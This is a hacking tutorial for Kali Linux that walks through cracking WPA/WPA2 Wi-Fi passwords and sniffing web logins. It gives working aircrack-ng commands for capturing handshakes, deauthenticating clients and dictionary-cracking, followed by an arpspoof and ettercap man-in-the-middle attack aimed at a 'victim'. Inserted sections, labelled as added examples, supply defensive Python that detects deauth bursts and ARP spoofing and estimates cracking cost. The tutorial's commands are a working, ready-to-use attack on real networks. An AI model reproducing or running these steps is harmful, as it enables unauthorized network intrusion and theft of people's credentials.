Cracking WPA Wifi, Packet sniffing passwords. – Kali Linux & BackTrack
Cracking WPA WiFi and packet sniffing passwords using the Kali Linux and BackTrack operating systems. Both are useful because they come with the tools pre-installed; all you have to do is open a terminal and look up the usage of any tool. For this tutorial we’ll be using Kali Linux or BackTrack. There are other pentesting operating systems as well, but Kali Linux Sana 2.0 is pretty good in terms of interface and updates.
This small and simple guide is for those who want to know some basics.
You will need to be on a Linux OS for this, preferably Kali Linux or at least a BackTrack distro. If you don’t have either of those you will need to install the software.
Install software:
sudo apt-get install aircrack-ng (wpa/2 cracking)
sudo apt-get install ettercap (packet sniffing)
# Anything with a hash (‘#’) we will not type as code, they will just be comments.
# In Terminal/konsole… :
Code:
ifconfig #Displays list of network adapters.
# You want to get the name of your wireless card, it should be something like: wlan0, eth1…
# It is unlikely to be ‘lo, eth0…’ If you do not know what your network card device is named,
# use google to help you find out.
# Command 1:
Code:
airmon-ng start (name of wireless card)
# EG: airmon-ng start wlan0
# You should see something saying “(monitor mode enabled on mon0)”
# If you don’t see that or there is an error (not a warning) then you did something wrong.
# You can check it’s working by typing ” ifconfig ” again, this time looking for ‘mon0’
# If you have ‘mon0’ you have completed the task above.
# Command 2:
Code:
airodump-ng mon0
# (The interface is a positional argument; ‘-i’ is airodump-ng’s short form of ‘--ivs’, which saves only IVs.)
# This will present to you a list of all the wireless networks; under ‘ESSID’ you can see the
# name of the network. It should look something like this:
# 00:11:22:33:44:55 -35 300 200 0 11 54e WPA2 CCMP PSK Wireless_network_ESSID
# You want to make sure the network you are attacking has ‘WPA’ or ‘WPA2’ as this guide
# only shows you how to crack that encryption type.
# You then want to copy the BSSID, in this case it’s ’00:11:22:33:44:55’.
# You also want to keep note of what ‘CH’ (Channel) it is on, in this case it’s ’11’
# Command 3:
Code:
airodump-ng --bssid (BSSID) -c (Channel) -w (any filename) mon0
# EG: airodump-ng --bssid 00:11:22:33:44:55 -c 11 -w capture1 --ignore-negative-one mon0
# (‘-w capture1’ makes airodump-ng write ‘capture1-01.cap’; the interface goes last.)
# Leave this running for a while, for the attack to be successful and for us to proceed…
# There will need to be devices connected to the network that we are attacking.
# We will know if there are ‘clients’ (devices) on this network when a/some entries
# Show up under the ‘STATION’ Heading. Make sure there is also a ‘BSSID’ next to the
# Station. Everything should look something like this:
Code:
# CH 11 ][ Elapsed: 1 mins ][ 2014-02-28 20:20
#
# BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
#
# 00:11:22:33:44:55  -35 100       20       60   30  11  54e  WPA2 CCMP   PSK  Wireless_network_ESSID
#
# BSSID              STATION            PWR   Rate    Lost  Frames  Probe
#
# AA:BB:CC:DD:EE:FF  00:11:22:33:44:55    0   12e-1      0     105  -
# So once you are sure there is a ‘client’ connected to the network we need to de-auth them.
# In a new Terminal window (keeping the previous one still open) type:
# Command 4:
Code:
aireplay-ng -0 1 -a (BSSID) -c (client's Station) mon0 --ignore-negative-one
# EG: aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c 00:11:22:33:44:55 mon0 --ignore-negative-one
# After executing this command go back to the other Terminal window and check if we captured
# a handshake. At the top, to the right of the date/time (e.g. ‘2014-03-01 12:25’), we will see:
# 2014-03-01 12:25 ][ WPA handshake: AA:BB:CC:DD:EE:FF
# You may need to repeat Command 4 with different clients (or the same one) until you get a handshake.
# You can also use Command 4 without specifying the client (‘-c 00:11:22:33:44:55’); with
# that part removed there is still a chance of deauthing a client, but it is less likely…
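What the deauth step looks like from the network’s side. This is an added example, not code from the tutorial: Command 4 makes aireplay-ng emit a burst of deauthentication frames, and a monitor-mode sensor (a wireless IDS) sees exactly those frames. The script below counts deauth/disassoc frames per BSSID inside a sliding time window and raises one alert per burst. The frame records are constructed sample data, and the field names (ts, type, subtype, bssid, src, dst) are this example’s own convention, not a library format.

```python
"""Added example (not part of the original tutorial): detecting a
deauthentication burst from constructed 802.11 management-frame records."""
from collections import defaultdict, deque

# 802.11 management frames have type 0; these are the subtypes we care about.
MGMT_TYPE = 0
BEACON_SUBTYPE = 8
DISASSOC_SUBTYPE = 10
DEAUTH_SUBTYPE = 12


def detect_deauth_bursts(frames, window_s=2.0, threshold=5):
    """Return a list of (bssid, burst_start_ts, count) alerts.

    An alert fires the first time `threshold` or more deauth/disassoc frames
    for the same BSSID fall inside a `window_s`-second window, and does not
    fire again for that BSSID until its rate drops below the threshold.
    """
    recent = defaultdict(deque)   # bssid -> timestamps inside the window
    in_burst = set()              # BSSIDs that are currently alerting
    alerts = []
    for f in sorted(frames, key=lambda f: f["ts"]):
        if f["type"] != MGMT_TYPE or f["subtype"] not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue
        bssid = f["bssid"].lower()
        q = recent[bssid]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window_s:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            if bssid not in in_burst:
                in_burst.add(bssid)
                alerts.append((bssid, q[0], len(q)))
        else:
            in_burst.discard(bssid)
    return alerts


AP = "00:11:22:33:44:55"      # constructed: the access point being watched
CLIENT = "aa:bb:cc:dd:ee:ff"  # constructed: one associated station

# Constructed sample capture: beacons every second, one legitimate deauth of
# an idle client at t=1.0, then eight deauths in under a second at t=10.
SAMPLE_FRAMES = (
    [{"ts": float(t), "type": MGMT_TYPE, "subtype": BEACON_SUBTYPE,
      "bssid": AP, "src": AP, "dst": "ff:ff:ff:ff:ff:ff"} for t in range(12)]
    + [{"ts": 1.0, "type": MGMT_TYPE, "subtype": DEAUTH_SUBTYPE,
        "bssid": AP, "src": AP, "dst": CLIENT}]
    + [{"ts": 10.0 + i * 0.1, "type": MGMT_TYPE, "subtype": DEAUTH_SUBTYPE,
        "bssid": AP, "src": AP, "dst": CLIENT} for i in range(8)]
)

if __name__ == "__main__":
    window = 2.0
    for bssid, start, count in detect_deauth_bursts(SAMPLE_FRAMES, window_s=window):
        print(f"ALERT deauth burst on {bssid}: {count} frames within "
              f"{window}s starting at t={start}")
```

The single deauth at t=1.0 is left alone because access points do send one legitimately when a client goes idle; only the rate within the window is suspicious, which is why the threshold and window are parameters rather than fixed values.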
# So now you have captured the WPA handshake we can begin cracking it.
# You can stop ‘airodump-ng’ by pushing ‘ctrl + c’ and take your aircard out of monitor mode:
# Command 5
Code:
airmon-ng stop mon0
# You no longer actually need to be in the same area as the access point; you can go home if you want.
# For this next step you probably want a strong computer (powerful CPU). If you will just use the same computer
# that’s ok too; if you do decide to use another computer you will need to install ‘aircrack-ng’, which is available on
# any platform…
# You are also going to need a wordlist and a lot of free time (or be able to leave the computer running).
# I’d recommend a wordlist from CrackStation.
# I commonly use the 247MB (648MB expanded) download, but if you have a good computer and like 42
# hours to spare you can use the 4.2GB (15GB expanded) one.
# Command 6:
Code:
aircrack-ng -w (wordlist) -b (bssid) (capture file)
# EG: aircrack-ng -w Downloads/crackstation-human-only.txt -b AA:BB:CC:DD:EE:FF capture1-01.cap
# (airodump-ng appends a counter to the prefix given with ‘-w’, so ‘-w capture1’ produces ‘capture1-01.cap’.)
# Note: the ‘-b AA:BB:CC:DD:EE:FF’ is optional; if you don’t specify it, it will just give you a list to choose
# from, likely to be the only one you attacked. If you did not successfully capture the handshake it will say
# “Got no data packets from target network!”
# If everything worked you should be presented with something like this:
Code:
# Aircrack-ng 1.2 beta2
# [00:00:05] 205 keys tested (500 k/s)
#
# Current passphrase: potato
#
# Master Key : 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#
# Transient Key: 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
#
# EAPOL HMAC : 00 11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF
# After letting this run through for ages you should see:
Code:
# KEY FOUND! [ password123 ]
# And now you can access the network with the wpa password.
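Why the “500 k/s” in the output above is the ceiling, and what that means for choosing a passphrase. This is an added example, not code from the tutorial or from aircrack-ng: WPA/WPA2-PSK derives the Pairwise Master Key from the passphrase and SSID with PBKDF2-HMAC-SHA1 at 4096 iterations (IEEE 802.11i), so every wordlist candidate costs one full derivation. The script derives a PMK the standard way, checks it against the published 802.11i test vector, measures this machine’s single-core rate, and estimates how long a list or a brute-force space survives at the tutorial’s 500 k/s. The list size used in the estimate is a constructed placeholder, not a measurement of the CrackStation files.

```python
"""Added example (not part of the original tutorial): the WPA-PSK key
derivation that makes dictionary attacks slow, plus survival-time estimates."""
import hashlib
import time

PMK_ITERATIONS = 4096   # fixed by IEEE 802.11i
PMK_LEN = 32            # 256-bit PMK


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096, 32), as specified in 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PMK_ITERATIONS, PMK_LEN)


def measure_rate(ssid: str = "Wireless_network_ESSID", samples: int = 200) -> float:
    """Single-core PMK derivations per second on this machine (no GPU, no SIMD)."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"candidate{i}", ssid)   # constructed throw-away candidates
    return samples / (time.perf_counter() - start)


def brute_force_space(alphabet_size: int, length: int) -> int:
    """Number of passphrases of exactly `length` symbols drawn from an alphabet."""
    return alphabet_size ** length


def seconds_to_exhaust(candidates: int, rate_per_s: float) -> float:
    """Worst-case time to try every candidate at the given rate."""
    return candidates / rate_per_s


if __name__ == "__main__":
    # Known-answer test from the IEEE 802.11i PSK test vectors (Annex H.4.1).
    assert wpa_pmk("password", "IEEE").hex() == (
        "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")
    print(f"this machine, one core via hashlib: {measure_rate():,.0f} PMK/s")
    rate = 500_000   # the "500 k/s" shown in the tutorial's aircrack-ng output
    for label, n in [("10-million-entry wordlist (constructed size)", 10_000_000),
                     ("8 random lowercase letters", brute_force_space(26, 8)),
                     ("12 random mixed-case alphanumerics", brute_force_space(62, 12))]:
        hours = seconds_to_exhaust(n, rate) / 3600
        print(f"{label}: {hours:,.1f} hours at {rate:,} keys/s")
```

The takeaway for whoever owns the network: the iteration count is fixed by the standard, so the only lever is a passphrase that is neither in a public list nor short enough for the brute-force rows to come out in hours.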
Sniffing passwords: (requires access to the victim’s network)
# Once connected to the network open up Terminal and type:
# Command 1:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
# (Note the space before ‘>’: ‘echo 1>’ would redirect echo’s own output and write an empty line instead of ‘1’.)
# Command 2:
Code:
nano /etc/ettercap/etter.conf
# Hold the down arrow to go down the page until you see:
Code:
# #------
# # Linux
# #------
# ...
# #If you use iptables:
# #redir_command_on = "iptables -t ....
# #redir_command_off = "iptables -t ....
# Remove the ‘#’ from both of the ‘redir_command’ lines. It should look something like this:
Code:
# #If you use iptables:
# redir_command_on = "iptables -t ....
# redir_command_off = "iptables -t ....
# once you’ve done that hit: ‘ctrl + x ‘ then ‘y’ then ‘ENTER’
# Command 3:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# Command 4:
Code:
arpspoof -i (name of aircard) -t (victim-ip) (gateway-ip)
# EG: arpspoof -i wlan0 -t 192.168.1.59 192.168.1.254
# You can find the IPs of people on the network using ‘nmap’ (a tutorial will not be supplied here)
# While ‘arpspoof’ is running, open another terminal window and run:
# Command 5:
Code:
ettercap -T -q -i (name of aircard) /(victim-ip)/ /(gateway-ip)/
# EG: ettercap -T -q -i wlan0 /192.168.1.59/ /192.168.1.254/
# Done. If the victim navigates to any page and posts any data (like usernames/passwords) to a webpage
# they will be logged here.
# Note this is likely to show a lot of https warnings, and looks kinda suspicious.
# When you are finished sniffing packets… push ‘ctrl + c’ in the terminal running ‘arpspoof’ and
# push ‘q’ in the terminal running ‘ettercap’
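How the arpspoof step in Command 4 shows up to a host or sensor on the same network. This is an added example, not code from the tutorial or from the ettercap/dsniff projects: arpspoof keeps sending ARP replies that bind the gateway’s IP to the attacking interface’s MAC, so the tell-tale is an IP address whose MAC binding changes (especially the gateway’s) and a single MAC that claims more than one IP. The functions below track the first MAC seen for each sender IP, optionally seeded with known-good bindings, and report each re-binding once. The ARP reply records and all addresses are constructed; on a real host they would come from a packet capture or from polling the ARP table with `ip neigh`. Field names (ts, sender_ip, sender_mac) are this example’s own convention.

```python
"""Added example (not part of the original tutorial): detecting ARP cache
poisoning from constructed ARP reply records."""


def find_arp_conflicts(arp_replies, trusted=None):
    """Return [(ip, expected_mac, offending_mac, first_seen_ts), ...].

    `arp_replies` is an iterable of dicts with keys ts, sender_ip, sender_mac.
    `trusted` optionally seeds ip -> mac bindings (gateway, DNS server, ...) so
    that a spoof arriving before the legitimate host speaks is still caught.
    """
    bindings = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    reported = set()
    conflicts = []
    for reply in sorted(arp_replies, key=lambda r: r["ts"]):
        ip, mac = reply["sender_ip"], reply["sender_mac"].lower()
        expected = bindings.setdefault(ip, mac)   # first binding wins
        if mac != expected and (ip, mac) not in reported:
            reported.add((ip, mac))               # one alert per offending pair
            conflicts.append((ip, expected, mac, reply["ts"]))
    return conflicts


def macs_claiming_multiple_ips(arp_replies):
    """Return {mac: sorted IPs} for every MAC that announced more than one IP.

    An interface normally announces one IP; a MAC claiming its own address and
    the gateway's at the same time is what an ARP-spoofing host looks like.
    """
    claims = {}
    for reply in arp_replies:
        claims.setdefault(reply["sender_mac"].lower(), set()).add(reply["sender_ip"])
    return {mac: sorted(ips) for mac, ips in claims.items() if len(ips) > 1}


# Constructed addresses; the IPs match the tutorial's example, the MACs are made up.
GATEWAY_IP, GATEWAY_MAC = "192.168.1.254", "00:aa:aa:aa:aa:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.59", "00:bb:bb:bb:bb:02"
ROGUE_IP, ROGUE_MAC = "192.168.1.7", "00:cc:cc:cc:cc:03"   # the host running arpspoof

# Constructed sample: normal replies, then periodic unsolicited replies claiming
# the gateway IP from ROGUE_MAC, while ROGUE_MAC also answers for its own IP.
SAMPLE_REPLIES = (
    [{"ts": 0.0, "sender_ip": GATEWAY_IP, "sender_mac": GATEWAY_MAC},
     {"ts": 0.5, "sender_ip": VICTIM_IP, "sender_mac": VICTIM_MAC},
     {"ts": 0.8, "sender_ip": ROGUE_IP, "sender_mac": ROGUE_MAC}]
    + [{"ts": 30.0 + 2 * i, "sender_ip": GATEWAY_IP, "sender_mac": ROGUE_MAC}
       for i in range(5)]
)

if __name__ == "__main__":
    for ip, good, bad, ts in find_arp_conflicts(SAMPLE_REPLIES,
                                                trusted={GATEWAY_IP: GATEWAY_MAC}):
        print(f"ALERT t={ts}: {ip} re-bound from {good} to {bad}")
    for mac, ips in macs_claiming_multiple_ips(SAMPLE_REPLIES).items():
        print(f"ALERT {mac} claims several IPs: {', '.join(ips)}")
```

Seeding `trusted` matters: without it the detector believes whichever MAC spoke first, so a spoof that starts before the gateway has sent a reply would be taken as the baseline and the real gateway reported as the intruder.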
– Tutorial by Iamlegend